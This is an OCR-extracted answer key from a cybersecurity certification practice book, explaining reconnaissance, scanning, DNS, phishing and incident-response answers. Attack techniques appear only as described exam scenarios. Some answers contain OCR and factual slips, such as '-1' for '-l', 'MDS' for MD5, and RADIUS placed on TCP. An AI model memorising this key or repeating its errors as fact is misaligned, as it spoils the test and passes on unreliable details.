LPR/LPD port, 631 is the IPP port commonly used by many print servers, and TCP is 
the RAW, or direct, IP port. While this could be another type of device, it is most likely a 
network-connected printer. 


D. Cassandra should report that password hashes, user files, and domain details may 
have been exposed. Windows does not store plain-text Windows account passwords, so 
this should not be a concern unless the administrator keeps them in a file! 
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B. Windows 10 has quite a few built-in options for reboots after patches, but if users are 
logged in and a forced restart is not set via Group Policy, patches may not be installed 
for a very long time. Lauren should work with system administrators and user groups to 
ensure that a reasonable reboot policy can be put into place. 


D. While application sharding and query optimization can help services respond under 
heavy loads, Jarett’s best bet is to work with a content distribution network (CDN) that 
has built-in DDoS mitigation technologies. This will allow his content to be accessible 
even if his primary service is taken offline and will spread the load to other servers dur- 
ing attacks, even if the CDN’s anti-DDoS capabilities can’t entirely mitigate the attack. 
Aggressive aging can help when implemented on a firewall and may help somewhat with 
survivability but is less useful for large-scale DDoS attacks. 


B. The system is showing normal ports for a Windows file server. It is most likely that 
Frank’s escalation to management resulted in action by the server administrator. 


C. Using telnet to connect to remote services to validate their response is a useful tech- 
nique for service validation. It doesn’t always work but can allow you to interact with the 
service to gather information manually. 


C. If this Google search returns information, it will show MySQL connection informa- 
tion, including passwords. Adam should immediately report this finding to management 
and should recommend that all exposed passwords be changed immediately and that the 
misconfiguration that resulted in the files being exposed should be fixed, and the reason it 
occurred should be identified. This does not tell you whether MySQL services are exposed 
remotely and does not mean that an incident has already occurred. At this point, Adam 
only knows that a misconfiguration has occurred. Changing all of the connection strings 
wont fix the root issue. 


A. Extended Validation (EV) certificates require additional action to validate that the 
requester’s legal identity is known, as well as the operational and physical presence of 

the website owner. In addition, the requesting organization has to prove that the domain 
owner has control over the domain name and that the person requesting the certificate has 
the authority to do so. Finally, they require a signature requirement for an authorized offi- 
cer of the company. DV certificates require domain ownership validation, OV certificates 
require proof of the right to manage the domain name, and IV certificates are made up for 
this question. 


C. Attackers often use built-in editing tools that are inadvertently or purposefully 
exposed to edit files to inject malicious code. In this case, someone has attempted to 
modify the 404 file displayed by WordPress. Anybody who received a 404 error from this 
installation could have been exposed to malicious code inserted into the 404 page or sim- 
ply a defaced 404 page. 


C. This shows an attempted SQL injection attack. The query reads 17 UNION SELECT 0 
and then looks for the username, user ID, password, and email from the users table. 
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B. nmap can combine operating system identification and time to live to take a reasonable 
guess at the number of hops in the network path between the scanner and a remote sys- 
tem. The operating system guess will provide the base time to live, and the TTL counter 
will decrement at each hop. Given these two pieces of information, nmap takes an edu- 
cated but often very accurate guess. 


B. Studies have shown that 87 percent of the U.S. population can be uniquely identified 
with their date of birth, gender, and ZIP code. If Charles can obtain this information, he 
has a very high chance of identifying the right individual. 


B. The -1 flag is a key hint here, indicating that netcat was set up as a listener. Any con- 
nection to port 43501 will result in example.zip being sent to the connecting application. 
Typically, a malicious user would then connect to that port using netcat from a remote 
system to download the file. 


D. This scan shows Bob that he is likely on a network using some portion of the 
10.0.0.0/8 private IP space. An initial scan of the 10.0.2.0/24 network to determine what 
is near him would be a good start. Since the Zenmap scan was run to a single exter- 

nal host, it will not show other hosts on the local network, so there may be more than 
two nodes on the network. Bob cannot make determinations about what the host at 
96.120.24.121 is, beyond a device on the route between the local host and his remote scan 
destination. 


B. Repeated failures from the same host likely indicate a brute-force attack against the 
root account. 


C. This Google dork relies on log files being inadvertently exposed for a site. If the 
authentication logs are exposed, this will show lists of failed logins, along with login 
paths, possibly providing Charles with a useful list of usernames. He can then leverage 
that list by attempting logins, by gathering further information on the users, or by using 
social engineering. 


B. This type of probe is known as domain harvesting and relies on message rejec- 

tion error messages to help the individual running the probe to determine which email 
accounts actually exist. Rick may want to disable delivery receipts, disable nondeliverable 
responses, or investigate more advanced techniques like false nondeliverable responses or 
recipient filtering and tar pitting. 


B. SIEM systems typically provide alerting, event and log correlation, compliance data 
gathering and reporting, data and log aggregation, and data retention capabilities. This 
also means that they can be used for forensic analysis as they should be designed to pro- 
vide a secure copy of data. They do not typically provide performance management-spe- 
cific capabilities. 


C. Relying on hashing means that Charles will only be able to identify the specific ver- 
sions of malware packages that have already been identified. This is a consistent problem 
with signature-based detections, and malware packages commonly implement polymor- 
phic capabilities that mean that two instances of the same package will not have identical 
hashes because of changes meant to avoid signature-based detection systems. 
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B. Lauren’s best option from this list is to query DNS using WHOIS. She might also 
choose to use a BGP looking glass, but most of the information she will need will be in 
WHOIS. If she simply scans the network the web server is in, she may end up scanning 
a third-party hosting provider, or other systems that aren’t owned by her organization 
in the /24 subnet range. Contacting ICANN isn’t necessary with access to WHOIS, 
and depending on what country Lauren is in, ICANN may not have the data she wants. 
Finally, using traceroute will only show the IP address of the system she queries; she 
needs more data to perform a useful scan in most instances. 


C. Most data center firewalls are configured to only allow the ports for publicly accessible 
services through to other networks. Location C is on an internal network, so Lauren will 
probably see more ports than if she tried to scan data center systems from location A, but 
it is likely that she will see far fewer ports than a portscan of the data center from inside 
the data center firewall will show. 


B. Lauren will see the most important information about her organization at location B, 
which provides a view of data center servers behind the data center firewall. To get 

more information, she should request that the client network firewall ruleset include a 
rule allowing her scanner to scan through the firewall to all ports for all systems on all 
protocols. 


A. Since Andrea is attempting to stop external scans from gathering information about 
her network topology, the firewall is the best place to stop them. A well-designed ruleset 
can stop, or at least limit, the amount of network topology information that attackers can 
collect. 


C. This is an example of pretexting, which relies on creating a scenario that the victim 
will believe, resulting in the attacker gaining access. Baiting uses an item or something 
that the user desires to cause them to fall for a phishing style attack. Quid pro quo prom- 
ises a benefit in exchange for information, and whaling is a phishing attack specifically 
aimed at important users. 


B. The three objectives of cybersecurity are confidentiality, integrity, and availability. 
Hashing and the use of integrity monitoring tools like Tripwire are both techniques used 
to preserve integrity; in fact, file integrity monitoring tools typically use hashing to verify 
that files remain intact and unchanged. 


C. Random or deterministic sampling can help Sam’s team capture usable flows despite 
not being able to handle the full throughput of their network. Random sampling will 
capture a random packet out of every n packets, with n set by the user. Deterministic sam- 
pling simply takes the every nth packet that passes through, so Sam might sample the 1st, 
11th, 21st, and so on. This means that small flows may be missed, but in this case, sam- 
pling half of all packets is still possible, meaning most flows will still be captured. 


B. Whaling is a term used to specifically denote phishing attacks aimed at high-ranking 
officers of a company. Spear phishing describes phishing messages apparently sent by an 
individual or organization that the recipient is familiar with and leverages trust in that 
organization. Neither tuna phishing nor SAML phishing are industry terms. 
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C. Brandon should select RIPE, the regional Internet registry for Europe, the Middle 
East, and parts of Central Asia. AFRINIC serves Africa, APNIC serves the Asia/Pacific 
region, and LACNIC serves Latin America and the Caribbean. 


B. netstat can be used to list listening ports. The -1 flag displays listening ports, while 
-t limits it to TCP ports. As you might expect, -u works for UDP ports. 


B. Lauren can determine only that the default administrative shares are enabled. While 
administrative shares are useful for remote administration, they can pose a threat for sys- 
tems that do not require them, and some security baselines suggest disabling them in the 
registry if they are not used. 


C. Greg is seeing a significant increase in network latency for the host he is scanning, 
which could result in performance issues for users of the server. Greg needs to slow down 
his scan, which can be accomplished by reducing the number of concurrent scans. 


C. A mandatory access control system relies on the operating system to constrain what 
actions or access a subject can perform on an object. Role-based access control uses roles 
to determine access to resources, and discretionary access control allows subjects to con- 
trol access to objects that they own or are responsible for. Level-based access control is a 
type of role-based access control. 


B. Testing for common sample and default files is a common tactic for vulnerability 
scanners. Janet can reasonably presume that her Apache web server was scanned using a 
vulnerability scanner. 


B. Charles should immediately notice that all traffic comes from one host (10.100.25.14) 
and is sent to the same host (10.100.18.12). All the traffic shown is TCP SYNs to well- 
known ports. Charles should quickly identify this as a SY N-based port scan. 


A. Susan’s best option is to submit the file to a tool like VirusTotal, which will scan it 

for virus-like behaviors and known malware tools. Checking the hash by using either a 
manual check or by using the National Software Reference Library can tell her if the file 
matches a known good version but won’t tell her if it includes malware. Running a suspect 
file is the worst option on the list! 


A. The U.S. Department of Defense’s Trusted Foundry program is intended to ensure the 
integrity and confidentiality of integrated circuits throughout the design and manufacturing 
life cycle while retaining access to leading-edge technology for trusted and untrusted uses. 


C. TCP port 22 indicates that this is most likely a ssh scan, and the single packet with no 
response traffic indicates unsuccessful connection attempts. If the system is not normally 
used for scanning for open ssh servers, Alice should look into why it is behaving this way. 


B. If Chris can perform a zone transfer, he can gather all of the organization’s DNS infor- 
mation, including domain servers, host names, MX and CNAME records, time to live 
records, zone serial number data, and other information. This is the easiest way to gather 
the most information about an organization via DNS if it is possible. Unfortunately, for 
penetration testers (and attackers!), few organizations allow untrusted systems to perform 
zone transfers. 
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A. Luke knows that Social Security number breaches are regulated in most states in the 
United States and that this means his organization has experienced a regulated informa- 
tion breach. He will now most likely have to take actions as required by law in the states 
in which they have Nexus. 


C. Chris is performing a type of social media profiling. While common usernames may 
not tell him very much, unique usernames or those commonly used by a specific target can 
help him gather more information about the sites his targets use. 


C. Performing a WHOIS query is the only passive reconnaissance technique listed. Each 
of the other techniques performs an active reconnaissance task. 


A. Passive network mapping can be done by capturing network traffic using a sniffing 
tool like Wireshark. Active scanners including nmap, the Angry IP Scanner, and netcat 
(with the -z flag for port scanning) could all set off alarms as they scan systems on the 
network. 


B. Multifactor authentication helps reduce the risk of a captured or stolen password by 
requiring more than one factor to authenticate. Attackers are less likely to have also stolen 
a token, code, or biometric factor. 


B. AAAA records are IPv6 address records. This means that Chris may also want to scan 
for hosts that are available via IPv6 gateways. The rest of the answers here are made up 
for this question. 


D. TheHarvester is an email collection tool that can automatically gather email addresses 
from a domain, website, or other source. nmap does not provide an email-gathering capa- 
bility, cree.py is a geolocation tool, and MailSnarf was made up for this question. 


B. Zenmap topologies show a number of pieces of useful information. The icons next to 
DemoHost2 show the following information: a relative assessment of how many ports are 
open, with white showing “not scanned,” green showing less than three open ports, yel- 
low showing three to six open ports, and red showing more than six open ports. Next, it 
shows a firewall is enabled, and finally the lock icon shows that some ports are filtered. 

In this scan, only DemoHost2 has been identified by nmap as currently running a firewall, 
which doesn’t mean that other hosts are not actually running firewalls! 


B. It is critical to determine when a penetration test will occur and what systems, net- 
works, personnel, and other targets are part of the test and which are not. In addition, 
testers must have the proper permission to perform the test. The content and format of the 
summary are important but not critical to have in place before the penetration test occurs. 


B. This capture shows SQL injection attacks being attempted. Since this is the reconnais- 
sance phase, the red team should not be actively attempting to exploit vulnerabilities and 
has violated the rules of engagement. 


A. TCP port 636 is often used for secure LDAP, and secure HTTP typically uses TCP 
443. While other services could use these ports, Jennifer’s best bet is to presume that they 
will be providing the services they are typically associated with. 
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B. Lauren has added an entry to the hosts file that routes all traffic for example.com to 
her local address. This is a useful technique to prevent a system from contacting a mali- 
cious host or domain or to simply prevent a nontechnical user from visiting specific sites 
or domains. 


D. The POST shows a file being uploaded, and the GET shows an attempt to retrieve it. If 
Cynthia doesn’t expect her system to allow uploads, she should check into what occurred. If 
she searches for r57.php, she will become much more concerned; it is a remote access tool! 


A. Rhonda’s next step is to prepare to pivot. To do so, she needs to browse for additional 
systems and to identify the methods she will use to access them. At times, this will move 
her back into the discovery phase. 


A. Port security filters on MAC address and the command Ben executed changed the 
MAC address of his PC. In most cases, simply changing a MAC address will not help him 
bypass NAC, and both firewalls and IPS won’t care about his MAC address. 


A. The nmap -T flag accepts a setting between 0 (or “paranoid”) and 5 or (“insane”). 
When Scott sets his scan to use the insane setting, it will perform the fastest scanning it 
can, which will likely set off any IDS or IPS that is watching for scans. 


D. Microsoft SQL typically runs on TCP ports 1433 and 1434. Oracle’s default is 1521, 
IRC is 6667, and VNC is 5900. 


B. Alice can use trend analysis to help her determine what attacks are most likely to tar- 
get her organization and then take action based on the trends that are identified. 


B. Cloudflare, Akamai, and other content distribution networks use a network of distrib- 
uted servers to serve information closer to requesters. In some cases, this may make parts 
of a vulnerability scan less useful, while others may remain valid. Here, Andrea simply 
knows that the content is hosted in a CDN and that she may not get all of the information 
she wants from a scan. 


C. The whoami command will show the username and its domain. This can be useful 
when determining whether a service is running as a user or a service account. 


B. Large data flows leaving an organization’s network may be a sign of data exfiltration 
by an advanced persistent threat. Using HTTPS to protect the data while making it look 
less suspicious is a common technique. 


A. Windows 10 Pro and Enterprise support application whitelisting. Chris can whitelist 
his allowed programs and then set the default mode to “disallowed”, preventing all 
other applications from running and thus blacklisting the application. This can be a bit of 
a maintenance hassle but can be useful for high-security environments or those in which 
limiting what programs can run is critical. 


C. While some blacklists use entire IP ranges, changing IP addresses for SMTP servers is 
often a valid quick fix. Some organizations even discover that one server has been black- 
listed and others in their cluster have not been. Migrating to a cloud provider or working 
with the blacklisting organizations can help, and online validation tools can help Lauren 
quickly check which lists her organization is on. Changing SMTP headers won’t help! 
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A. Tracy knows that most wired networks do not use end-to-end encryption by default 
and that wireless networks are typically more easily accessible than a wired network 

that requires physical access to a network jack or a VPN connection from an authorized 
account. Without more detail, she cannot determine whether authentication is required 
for both networks, but NAC is a common security feature of wired networks, and WPA2 
Enterprise requires authentication as well. Port security is used only for wired network 
connections. 


B. Most infrastructure-as-a-service providers will allow their customers to perform 
security scans as long as they follow the rules and policies around such scans. Ian should 
review his vendor’s security documentation and contact them for details if he has ques- 
tions. 


B. Port 3389 is the service port for RDP. If Fred doesn’t expect this port to be open on his 
point-of-sale terminals, he should immediately activate his incident response plan. 


D. Many system administrators have historically chosen 8080 and 8443 as the alternate 
service ports for plain-text and secure web services. While these ports could be used for 
any service, it would be reasonable for Cynthia to guess that a pair of services with ports 
like these belong to web servers. 


C. Using a UDP scan, as shown in option C, with the -sU flag will not properly identify 
printers since print service ports are TCP ports. The other commands will properly scan 
and identify many printers based on either their service ports (515, 631, 9100) or their OS 
version. 


B. TCP ports 1433 and 1434 are commonly associated with Microsoft SQL servers. A 
print server will likely use ports 515, 631, and 9100; a MySQL server will typically use 
3306; and alternate ports for web servers vary, but 8443 is a common alternative port. 


B. This nmap scan will scan for ssh (22), SMTP (25), DNS (53). and LDAP (389) on their 
typical ports. If the services are running on an alternate port, this scan will completely 
miss those and any other services. 


D. Linux and Unix systems typically keep user account information stored in /etc/ 
passwd, and /etc/shadow contains password and account expiration information. Using 
diff between the two files is not a useful strategy in this scenario. 


C. Load balancers can alias multiple servers to the same hostname. This can be confusing 
when conducting scans, as it may appear that multiple IP addresses or hosts are respond- 
ing for the same system. 


C. Best practice for most network devices is to put their administrative interfaces on a 
protected network. Many organizations then require administrators to connect via a jump 
box, adding another layer of protection. Preventing console access is typically not desir- 
able in case changes need to be made and a GUI is not available; login-block can help but 
will only slow down attacks and will not prevent them. 
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C. This scan shows only UDP ports. Since most services run as TCP services, this scan 
wouldn’t have identified most common servers. Ron should review the commands that his 
team issued as part of their exercise. If he finds that nmap was run with a -sU flag, he will 
have found the issue. 


C. A password combined with token-based authentication can prevent brute-force attacks 
that might succeed against a password or password and PIN combination. Biometric fac- 
tors are useful but often have significant maintenance and deployment overhead and are 
typically more difficult to use than a token-based second factor. 


C. This command will prevent commands entered at the bash shell prompt from being 
logged, as they are all sent to /dev/null. This type of action is one reason that adminis- 
trative accounts are often logged to remote hosts, preventing malicious insiders or attack- 
ers who gain administrative access from hiding their tracks. 


C. Monica issued a command that only stops a running service. It will restart at reboot 
unless the scripts that start it are disabled. On modern Ubuntu systems, that is handled 
by upstart. Other services may use init.d scripts. In either case, when asked a question 
like this, you can quickly identify this as a problem that occurred at reboot and remove 
the answer that isn’t likely to be correct. 


A. DNSSEC allows authoritative DNS servers to use digital signatures to validate its 
responses. 


B. Nathan is part of the white team, which manages the environment. The red team 
attacks, and the blue team defends. Black team is not a term that is commonly used in 
this context, but some organizations identify purple and green teams (often with varying 
descriptions for their responsibilities, which is admittedly confusing!). 


B. nmap provides both hardware and operating system identification capabilities as part of 
its common platform enumeration features. cpe: /o indicates operating system identifica- 
tion, and cpe: /h indicates hardware identification. 


D. The rules of engagement for a penetration test typically describe the scope, timing, 
authorization, and techniques that will be used (or that are prohibited). This helps to 
ensure that unexpected impacts are minimized and allows both the tester and the target 
organization to understand what will occur. Specifically listing authorized tools is not 
typical for most rules of engagement. 


D. DNS blackholing uses a list of known malicious domains or IP addresses and relies on 
listing the domains on an internal DNS server, which provides a fake reply. Route poison- 
ing prevents networks from sending data to a destination that is invalid. Routers do not 
typically have an anti-malware filter feature, and subdomain whitelisting was made up for 
this question. 


A. RADIUS typically uses TCP ports 1812 and 1813. Kerberos is primarily a UDP service 
although it also uses TCP 544 and 2105, Postgres uses 5432, and VNC uses 5500. 
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B. John has discovered a program that is accepting connections and has an open con- 
nection, neither of which is typical for the Minesweeper game. Attackers often disguise 
Trojans as innocuous applications, so John should follow his organization’s incident 
response plan. 


B. nmap supports quite a few firewall evasion techniques including spoofing the MAC 
(hardware) address, appending random data, setting scan delays, using decoy IP 
addresses, spoofing the source IP or port, modifying the MTU size, or intentionally frag- 
menting packets. 


B. FGDump is a tool used for Windows password auditing. If successful, it will dump the 
username and password hash for every user. 


A. The dig command provides information including the time the query was done, 
details of the query that was sent, and the flags sent. In most cases, however, host, 

dig -x, and nslookup will provide roughly the same information. zonet is not an actual 
Linux command. 


C. The which command will show Selah where the bash executable is being run from, 
typically /bin/bash. If she finds that bash is running from a user directory or somewhere 
else suspicious, she should immediately report it! (If you’re familiar with the printenv 
command, option D may be tricky; printenv doesn’t accept specific flags, so Selah would 
need to pipe the output to grep or to search it manually to find bash there.) 


D. Adam is using a jump box to provide access. A jump box, sometimes called a jump 
server or secure administrative host, is a system used to manage devices in a separate, typ- 
ically higher security zone. This prevents administrators from using a less secure adminis- 
trative workstation in the high security zone. 


A. Adding an iptables entry uses the -A flag to add to a list. Here, you can safely 
assume that OUTPUT is the outbound ruleset. The -d flag is used to designate the IP 
address or subnet range, and -j specifies the action, DROP. 


A. When an organization expires multiple certificates, it often indicates a security prob- 
lem that resulted in a need to invalidate the certificates. Fred should check for other infor- 
mation about a possible compromise near the dates of expiration. 


B. Both using CAPTCHAs to prevent bots and implementing a reasonable rate-limiting 
policy can limit the bulk collection of data. Privacy and proxy services help keep reg- 
istrant data private. Blacklisting is useful to temporarily block abusive IP addresses or 
networks but can result in long-term issues if it is broadly used or if a legitimate site is 
blocked. Finally, not publishing TLD zone files can help limit WHOIS abuse, but not all 
TLDs can avoid doing so. 


D. Casey knows that she saw three open ports and that nmap took its best guess at what 
was running on those ports. In this case, the system is actually a Kali Linux system, a 
Debian-based distribution. This is not a Cisco device, it is not running CentOS, and it was 
not built by IBM. 
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B. The rules of engagement are the rules that a penetration test or other security assess- 
ment are conducted under. They typically list what type of assessment, when, where, and 
how it will be conducted; what communication and notification will be done; and other 
details that are critical to ensure that the assessment is done in a way that meets the orga- 
nization’s needs. 


D. Since SNMP does not reliably report on closed UDP ports and SNMP servers don’t 
respond to requests with invalid community strings, any of these answers could be true. 
This means that receiving “no response” to an SNMP query can mean that the machines 
are unreachable (often due to a firewall), they are not running SNMP, or the community 
string that was used is incorrect. 


B. Angela can use Network Miner, a tool that can analyze existing packet capture files to 
do OS identification and which identifies and marks images, files, credentials, sessions, 
DNS queries, parameters, and a variety of other details. Ettercap can perform passive 
TCP stack fingerprinting but is primarily a man-in-the-middle tool, dradis is an open 
source collaboration platform for security teams, and Sharkbait is not a security tool or 
term. 


C. Rick’s team has set up a honeynet, which is a group of systems set up to attract 
attackers while capturing the traffic they send and the tools and techniques they use. A 
honeypot is a single system set up in a similar way, while a tarpit is a system set up to slow 
down attackers. A blackhole is often used on a network as a destination for traffic that 
will be silently discarded. 


A. A canonical name (CNAME) is used to alias one name to another. MX records are 
used for mail servers, SPF records indicate the mail exchanges (M Xes) that are authorized 
to send mail for a domain, and an SOA record is the Start of Authority record that notes 
where the domain is delegated from its parent domain. 


C. AppLocker is a tool available for Windows 10 systems that allows rules based on file 
attributes to limit what applications and files users can run, including executable files, 
scripts, Windows Installer files, DLLs, packaged applications, and packaged application 
installers. Secpol.msc is the security policy snap-in and controls other parts of the Win- 
dows security configuration. FileVault is the MacOS file encryption system, and GPed is a 
made-up program. 


C. This output shows a brute-force attack run against the localhost’s root account using 
ssh. This resulted in the root user attempting to re-authenticate too many times, and PAM 
has blocked the retries. Fail2ban is not set up for this service. Thus, this is the one item 
that has not occurred. If it was enabled, the fail2ban log would read something like this: 


2017-07-11 12:00:00,111 fail2ban.actions: WARNING [ssh] Ban 127.0.0.1 
2017-07-11 12:00:00,111 fail2ban.actions: WARNING [ssh] Unban 127.0.0.1 


C. When a vulnerability exists and a patch has not been released or cannot be installed, 
compensating controls can provide appropriate protection. In the case of PCI-DSS (and 
other compliance standards), documenting what compensating controls were put in place 
and making that documentation available is an important step for compliance. 


326 


174. 


175. 


176. 


177. 


178. 


179. 


180. 


181. 


Appendix = Answers to Review Questions 


B. In many cases, backups are the best method to minimize the impact of a ransomware 
outbreak. While preventative measures can help, malware packages continue to change 
more quickly than detective controls like anti-malware software and NGFW device manu- 
facturers can react. A honeypot won’t help Adam prevent ransomware, so it can be easily 
dismissed when answering this question. 


A. Metasploit is primarily an exploitation tool. While it has modules that can be used 
for reconnaissance, it is primarily used to target discovered vulnerabilities. nmap, Nessus, 
and Maltego are all commonly used to discover information about an organization or 
individuals. 


C. The -sP flag for nmap indicates a ping scan, and /24 indicates a range of 255 


addresses. In this case, that means that nmap will scan for hosts that respond to ping in 
the 192.168.2.0 to 192.168.2.255 IP address range. 


A. Kara is performing a decomposition process on the malware she is investigating. 
Decomposition helps to understand a software package or program and can sometimes 
provide information more quickly than a static or dynamic analysis, because it does not 
have to run a program to analyze how it behaves and does not require intensive manual 
review of the underlying code or disassembly of compiled code. 


B. Identifying a SQL injection attack requires the ability to see the content of the query. 
Most stateful packet inspection firewalls do not show full packet content and instead log 
a success or fail based on a port, IP address, and protocol based on a rule. A DDoS attack 
may also be difficult to identify, but the massive amount of traffic from multiple sources 
to a single service can help point out the issue. 


B. Performing a scan from an on-site network connection is the most likely to provide 
more detail. Many organizations have a strong external network defense but typically 
provide fewer protections for on-site network connections to allow internal users to access 
services. It is possible that the organization uses services found only on less common ports 
or UDP only services, but both of these options have a lower chance of being true than 

for an on-site scan to succeed. nmap does provide firewall and IPS evasion capabilities, but 
this is also a less likely scenario. 


C. Gathering traceroute information about each system in a network can help provide 
insight into the network’s topology, including where routers, switches, and other devices 
may be located. It is not typical for ISPs to conduct unannounced scans, vulnerability 
scans would include additional scan traffic, and routers do not probe individual systems 
for BGP discovery. 


C. According to the Defense Microelectronics Activity (DMEA) website: “DMEA accred- 
its suppliers in the areas of integrated circuit design, aggregation, broker, mask manu- 
facturing, foundry, post processing, packaging/assembly and test services. These services 
cover a broad range of technologies and is intended to support both new and legacy appli- 
cations, both classified and unclassified.” This program acts to ensure that electronics are 
not compromised as part of their design process. 
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B. BGP looking glasses provide a public view of route information to hosts and networks. 
This can provide information to penetration testers about network connectivity. While 
nmap has many capabilities, it doesn’t provide route lookups. BGP route reflectors (also 
known as BGP speakers, advertise routes to peers) and route/path assimilators were made 
up for this question. 


C. Since LOIC can leverage hundreds or thousands of hosts, limiting each connecting 
host to a connection rate and volume through filters like those provided by the iptables 
hashlimit plug-in can help. IP-based blacklisting may work for smaller botnets but is dif- 
ficult to maintain for larger attacks and may eventually block legitimate traffic. Dropping 
all SYN packets would prevent all TCP connections, and route blocking filters are not a 
method used to prevent this type of attack. While he’s setting up firewall rules, Jeff may 
also want to investigate a denial-of-service mitigation partner or service in case the attack- 
ers move to more advanced methods or do overwhelm his link! 


C. Passive fingerprinting relies on the ability of a system to capture traffic to analyze. Pre- 
venting systems from using promiscuous mode will provide attackers with very little data 
when performing passive fingerprinting. Both intrusion prevention systems and firewalls 
can help with active fingerprinting but will do nothing to stop passive fingerprinting. 


D. The Windows service controller, sc, provides command-line control of services. 
Commands include start, stop, pause, query, and other service-related commands. Using 
Sc query provides a list of services, their display name, type, state, exit codes, checkpoint, 
and wait hint codes. Geoff can use output like this to check for unexpected services run- 
ning on the system if he has local command-line access for only a limited period of time. 


B. Adam has discovered a supervisory control and data acquisition system (SCADA). 
Typically, BAS indicates that the system is used for building automation. 


D. This view of htop shows both CPU1 and CPU2 are maxed out at 100 percent. 
Memory is just over 60 percent used. Almost all swap space is available. 


B. The top command will show a dynamic, real-time list of running processes. If 
Amanda runs this, she will immediately see that two processes are consuming 99 percent 
of a CPU each and can see the command that ran the program. 


D. The kill command is used to end processes in Linux. Amanda should issue the 
kill -9 command followed by the process ID of the processes she wants to end (the -9 
flag is the signal and means “really try hard to kill this process”). Since she has run both 
top and htop, she knows that she needs to end processes 3843 and 3820 to stop stress 
from consuming all of her resources. A little research after that will show her that stress 
is a stress testing application, so she may want to ask the user who ran it why they were 
using it if it wasn’t part of their job! 


C. Geoff built a reasonable initial list of operating system versions, but many devices on 
a modern network will not match this list, causing operating system version mismatch 
issues with the matching rules he built. He may need to add broader lists of acceptable 
operating systems, or his organization may need to upgrade or replace devices that cannot 
be upgraded to acceptable versions. 
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C. Lauren’s screenshot shows behavioral analysis of the executed code. From this, you 
can determine that malwr is a dynamic analysis sandbox that runs the malware sample to 
determine what it does while also analyzing the file. 


B. NAC solutions that implement employee job function—based criteria often use time- 
based controls to ensure that employees have access only when they are supposed to be 
working, role-based criteria because of their duties, and location-based rules to ensure that 
they access networks only where they work. Rule-based criteria typically focus on system 
health and configuration, thus focusing more on the computer or software than the user. 


C. The lsof command, or "List open files", can report on open files and which 
process opened them. Charles can use Lsof to find his answer: quickly! 


C. Rainbow tables exist for most reasonable MDS passwords, which means that Chris 
can likely recover the majority of the passwords belonging to his users relatively quickly. 
Once he is done, he can apply his company’s strong hashing method and compare them 
to the existing hashed passwords his organization stores. He may still be better off simply 
asking all of the impacted users to change their passwords if they reused them for the site 
and should consider multifactor authentication to avoid the issue in the future. 


D. While ssh port forwarding and ssh tunneling are both useful techniques for pivoting 

from a host that allows access, nmap requires a range of ports open for default scans. He 
could write a script and forward the full range of ports that nmap checks, but none of the 
commands listed will get him there. If Frank has access to proxychains, he could do this 
with two commands! 


C. Angela has captured part of a Nikto scan that targets a vulnerable .asp script that 
allows directory traversal attacks. If it was successful, the contents of files like boot.ini 
or /etc/passwd would be accessible using the web server. 


A. Since organizations often protect information about the technologies they use, 
searches of support forums and social engineering are often combined to gather informa- 
tion about the technologies they have in place. Port scanning will typically not provide 
detailed information about services and technologies. Social media review may provide 
some hints, but document metadata does not provide much information about specific 
technologies relevant to a penetration test or attack. 


C. LDAP directory servers typically support both soft and hard limits on queries, includ- 
ing the size of the query and how many queries can be conducted in a given time period. 
Setting a hard limit prevents LDAP users from exceeding the number set. A firewall would 
be useful to prevent access, and an IDS could show abuse. Requiring authentication isn’t 
useful for a public service. 


D. The accounts shown are disabled, and disabled accounts with a weak password are 
typically not a problem. If they are an issue, Saria’s best option would be to delete the 
accounts unless they are required for a specific purpose. 


B. Greg’s implementation is a form of DNS sinkholing that sends traffic to an alternate 
address, which acts as the sinkhole for traffic that would otherwise go to a known bad 
domain. 
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B. Malware often uses base64 encoding as part of its obfuscation attempts. There are 
multiple base64 formats, but online decoders can help quickly check to see whether the 
obfuscated code is just base64 encoded. Packers and other tools may use multiple meth- 
ods, making it difficult to figure out quickly. 


C. Jennifer can push an updated hosts file to her domain-connected systems that will 
direct traffic intended for known bad domains to the localhost or a safe system. She might 
want to work with a security analyst or other IT staff member to capture queries sent to 
that system to track any potentially infected workstations. A DNS sinkhole would work 
only if all the systems were using local DNS, and off-site users are likely to have DNS set- 
tings set by the local networks they connect to. Anti-malware applications may not have 
an update yet or may fail to detect the malware, and forcing a BGP update for third-party 
networks is likely a bad idea! 


A. Adversarial threats are individuals, groups, and organizations that are attempting to 
deliberately undermine the security of an organization. Adversaries may include trusted 
insiders, competitors, suppliers, customers, business partners, or even nation-states. 


C. Chris knows that domain registration information is publicly available and that his 
organization controls the data that is published. Since this does not expose anything that 
he should not expect to be accessible, Chris should categorize this as a low impact. 


C. Denial-of-service attacks are rarely part of a penetration test because of the risk they 
create for the target organization. In specific cases where DoS attacks are permitted, they 
are sometimes aimed at a nonproduction instance or network to test DoS handling tech- 
niques. 


C. Windows services can be started and stopped using sc (sc stop 'service') or wmic 
(wmic service where name='service' call ChangeStartmode Disabled) or via the 
services.msc GUI. secpol.msc controls security policy and will not allow Allan to stop 
a service. 


C. The increasing digit of the IP address of the target system (.6, .7, .8) and the ICMP 
protocol echo request indicate that this is a ping sweep. This could be part of a port scan, 
but the only behavior that is shown here is the ping sweep. This is ICMP and cannot be 

a three-way handshake, and a traceroute would follow a path, rather than a series of IP 
addresses. 


D. While the system responded on common Windows ports, you cannot determine 
whether it is a Windows system. It did respond, and both ports 139 and 445 were acces- 
sible. When the host the Wireshark capture was conducted from queried DNS, it did not 
receive a response, indicating that the system does not have a DNS entry (or at least, it 
doesn’t have one that is available to the host that did the scan and ran the Wireshark 
capture). 


D. nmap has a number of built-in anti-firewall capabilities including packet fragmenta- 
tion, decoy scans, spoofing of source IP and source port, and scan timing techniques that 
make detection less likely. Spoofing the target IP address won’t help; her packets still need 
to get to the actual target! 
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C. DNS poisoning uses modified DNS cache entries to redirect unsuspecting users to 
alternate IP addresses. This may be intentional if the DNS server owner wants to ensure 
that specific sites are blocked, but it can also be leveraged by attackers who manage to 
either take control of the DNS server or who manage to spoof or modify DNS updates. 


B. DNS poisoning uses modified DNS cache entries to redirect unsuspecting users to 
alternate IP addresses. This may be intentional if the DNS server owner wants to ensure 
that specific sites are blocked, but it can also be leveraged by attackers who manage to 
either take control of the DNS server or who manage to spoof or modify DNS updates. 


C. Internal security teams are typically referred to as the blue team for penetration testing 
and security exercises. Red teams are attackers, while the white team establishes the rules 
of engagement and performance metrics for the test. 


B. Original equipment manufacturer (OEM) documentation is provided by the builder 
or creator of the equipment, device, or software. It typically includes information about 
default and recommended settings. Most organizations use OEM and expert consensus 
recommended configurations that have been modified to match the requirements of their 
environment. 


Chapter 2: Domain 2: Vulnerability 
Management 


1. 


